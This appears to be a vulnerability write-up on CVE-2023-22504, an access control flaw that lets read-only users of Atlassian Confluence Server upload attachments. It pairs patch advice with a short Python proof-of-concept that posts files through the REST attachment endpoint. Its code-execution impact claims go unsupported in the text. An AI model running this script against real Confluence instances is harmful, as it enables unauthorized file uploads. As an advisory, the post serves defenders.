CVE-2023-22504: Broken Access Control vulnerability in Atlassian Confluence Server allows unauthorized file uploads

Atlassian Confluence Server is a widely used collaboration platform that provides a centralized environment for users to create, share, and discuss their ideas and projects. It has been reported that certain versions of the software are affected by a Broken Access Control vulnerability, allowing users with read-only permissions to upload attachments to pages they don't have write access to. In this post, we will provide a detailed analysis of this vulnerability, explain how it can be exploited, and discuss the potential impact on affected systems.

Affected Versions

The vulnerability affects Atlassian Confluence Server versions prior to 7.19.9.

Vulnerability Details

The vulnerability, officially designated as CVE-2023-22504, arises from a broken access control mechanism within the file attachment feature of Confluence. A user with read-only access to a page can exploit this vulnerability to upload arbitrary files to the server, potentially allowing them to execute malicious code or access sensitive information.

Discovery

This vulnerability was discovered by Rojan Rijal, a member of the Tinder Security Engineering Team. The discovery was reported to Atlassian, prompting the release of patches and updates to address the issue.

Exploit Details

The following code snippet demonstrates how to exploit this vulnerability with a simple Python script:

import requests

# Change these variables according to your setup
CONFLUENCE_URL = "https://your-confluence-instance.com";
USERNAME = "your-username"
PASSWORD = "your-password"
PAGE_ID = "123"
FILE_PATH = "path/to/your/file"

# Authenticate with Confluence API
session = requests.Session()
session.auth = (USERNAME, PASSWORD)
session.headers.update({"X-Atlassian-Token": "no-check"})

# Upload attachment to page
with open(FILE_PATH, "rb") as f:
    response = session.post(f"{CONFLUENCE_URL}/rest/api/content/{PAGE_ID}/child/attachment", files={"file": f})
    if response.status_code == 200:
        print(f"File {FILE_PATH} successfully uploaded to page {PAGE_ID}")
    else:
        print(f"Failed to upload file: {response.status_code} - {response.reason}")

Mitigation

Atlassian has addressed the vulnerability in Confluence Server version 7.19.9. Administrators are advised to update their Confluence Server installations to this version or later immediately. Patches can be downloaded from the official Atlassian website:

- Atlassian Confluence Server Download Page

Original References

- Official CVE-2023-22504 Advisory
- Atlassian Security Advisory

Conclusion

CVE-2023-22504 is a serious security vulnerability affecting Atlassian Confluence Server, which allows users with read-only access to upload files to pages they don't have write access to. Exploiting this vulnerability can lead to unauthorized access to sensitive information and potentially open the door for attackers to execute malicious code. It is essential for administrators to update their systems to the latest Confluence Server version to prevent exploitation of this vulnerability.

Timeline

Published on: 05/25/2023 14:15:00 UTC
Last modified on: 06/01/2023 16:41:00 UTC